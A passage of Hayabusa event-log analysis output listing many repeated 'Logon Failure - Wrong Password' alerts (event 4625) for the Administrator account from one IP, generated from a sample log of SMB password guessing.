NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcprXytyuBw380XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxfQWiSIhZYxwNjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FcL982boDelzeyzK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBAAjRdaR8U0tqt7 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EmqUjcltAW6StHQJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 129Rp3HCmRVRXw3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jpIIQP2oWEF51EBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HREGh5ppEkLAuEob | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVkpQvotEMfM8R0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm6uHEy5RJJBJ6FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPTyAkYjcIlko5lu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OjlRoo9Sot4Fx4Th | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XslY26kw2aBw19D8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1404fakprYeqGiNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2VfIjtBcXCRlOjp | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LPztyX4J9NV8EldT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 07flrrzWgsVBYaN2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vgkqkC1VvznGxR6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hMn6yDMLgLChJTL6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uSTokOJ31Tj0bLXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyRifC46GrNpTA4x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvNaby30vAT9drAX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wkYSOQ2bD51a4U8l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rqdOquL9Ax01RPPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nqCCiK5arcyRHha6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TpyTGZLkAb0w0kgW | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wa2pXrZKxeZZYKAq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dK0N5KeBgCze1YWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g4dHlwZjMzI5wU2s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GzF2ouP5KkRfsxnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSQxMrGlDiAOo6ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gL0rz3p1yG6RhfAT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyChoTSKgJeK6yqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tG4I11dwpBM9SM3l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7foAZ5Y1igCbHap | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ATDXUljQwg8WvUVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdmXaJqQMAG2g6Ao | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bjame5puT5CDeoIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0FGGVVkckmdURVh6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j0Smqw4cA4wG2Q6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLWloOhUYEQlj6y6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Tuxuykh0j5afeTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeXS6QwYhqJAOeuz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AqFSJCq5bmBW6dj1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DH1zyt1hxTgzajhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rrZxcWjUX4OgYYIb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ExtkYXSJI8F41uvw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sLh1Q3RieOoukiCT | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kNb2hZDxi4QrbQpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jCb1TMlFj2PjH2sA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rgF42C57Nx6F3HU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KZfFH9geIrxVYowJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWz1XeyxywR0o5gS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: og1kItEC6WhqXF37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0KhaJlD6tWwF2ky | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XUy0EKmjyD6ZYENA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h3MdGstPPFJDGzwG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTs0ZQa6LGrKZKsY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FefzWjMXSvMdvqcw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnUt9tPRSXR5mWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dehb4M6pcxi56Bkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tLXHvGiUqZyxax4W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP1gKcf1eeKm0RB1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldbN1odP77n0BOzO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: drRC8qCbPe5e4mdR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lBg39AUtzZi6Q4iz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huv5YEPo1n7UiFkq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9CLLwao1NDtBulxs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SB88EHHhDWhvJI87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBvklueV4MZo3pJ | IP Addr: 192.168.198.149 | AuthPackage: 
